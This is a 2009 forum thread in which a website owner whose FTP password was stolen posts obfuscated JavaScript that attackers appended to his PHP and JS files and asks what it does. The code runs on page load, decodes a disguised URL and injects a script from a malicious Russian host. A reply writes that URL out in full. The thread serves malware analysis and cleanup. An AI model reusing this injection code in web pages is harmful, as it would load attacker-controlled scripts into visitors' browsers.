1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Can anyone tell me what this javascript code does?

Discussion in 'HTML & JavaScript' started by j0b0123, Dec 8, 2009.

Tags:
  1. j0b0123

    j0b0123 Regular Member

    Joined:
    Oct 30, 2009
    Messages:
    262
    Likes Received:
    218
    Occupation:
    professional trader - stocks, forex, futures
    Location:
    Las Vegas, USA
    Home Page:
    Got a virus/trojan on my laptop which was not caught, which grabbed an ftp password for one of my sites. Aholes injected some code, but I am not familiar with even what this does.

    I have fixed the site, this was amended to the end of any index.php file and all .js files. The index.php ones were done with slightly different code (to turn on javascript) but the body was identical to this.

    I am trying to learn what this actually does, as its the first time I have seen this type of code, and searching on Google does not come up with anything.

    Any help about what this does would be appreciated, luckily I caught the stuff and changed all passwords etc before it got out of hand and spread much.

    Here is the code they put in:

    Code:
    /*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 = document.createElement('script');Hva23p3hnyirlpv7.setAttribute('type', 'text/javascript');Hva23p3hnyirlpv7.setAttribute('id', 'myscript1');Hva23p3hnyirlpv7.setAttribute('src',  'h))t#^t$#))!p&&#:^!&/^^/)^(@m&()y&#b(r@&&!!o)^w(&(s)^)$e(@&#r&))b^a#r!&$-#@c&#o#m#@&.)@$s)a!m$&s#)^u!$^n$g#!.$c!^o^@(m#.^n@!#a@@s#$!a#&-(@^g$o)#v)@&$.(!(@(e)&g&!#r)e)@)a^)t$!s(!(a@!l#e@.@)@r)#u(&#!:)@8!^)0!8$!(0!/^#m$$e)g^&a###v&!i&d!e))#o!@(.(@c&)o$!(m^&/^m&^e((^)g$!((a)#)^v@!i(@&#d#)e@&o$#.^c$!#o@m^/$#&l$a)r#@(e)^^d#&o(!()u#(t$)e##.$f(r^&(@/!(^&b!!i)$$l@)!)d^&.#@&(d$@$e(/)g$o^o$&^g^!&l()e!).(@^#c)$!o#&)@@m!/^$'.replace(/\$|\^|\!|&|\)|\(|@|#/ig, ''));Hva23p3hnyirlpv7.setAttribute('defer', 'defer');document.body.appendChild(Hva23p3hnyirlpv7);}} catch(e) {}
     
    Last edited: Dec 8, 2009
  2. grodt

    grodt Newbie

    Joined:
    Sep 6, 2009
    Messages:
    26
    Likes Received:
    6
    basically they're adding an external script to your page which can do and make your users do whatever is capable in the realms of javascript

    Edit: Here is the url decoded that it fetches the script from: http://mybrowserbar-com.samsung.com.nasa-gov.egreatsale.ru:8080/megavideo.com/megavideo.com/laredoute.fr/bild.de/google.com/
     
    • Thanks Thanks x 1
    Last edited: Dec 8, 2009
  3. j0b0123

    j0b0123 Regular Member

    Joined:
    Oct 30, 2009
    Messages:
    262
    Likes Received:
    218
    Occupation:
    professional trader - stocks, forex, futures
    Location:
    Las Vegas, USA
    Home Page:
    Cool, thanks for the decode, I had no idea how to do that so I could see what it was trying to do. I figured it was some kind of bs like that.
     
  4. goawayplease

    goawayplease Regular Member

    Joined:
    Apr 10, 2008
    Messages:
    299
    Likes Received:
    67
    Tt's using some kind of obfuscation to cover up the script embed; it might be a way to bypass anti-viral scanning or something.

    It's a pretty clever piece of JS.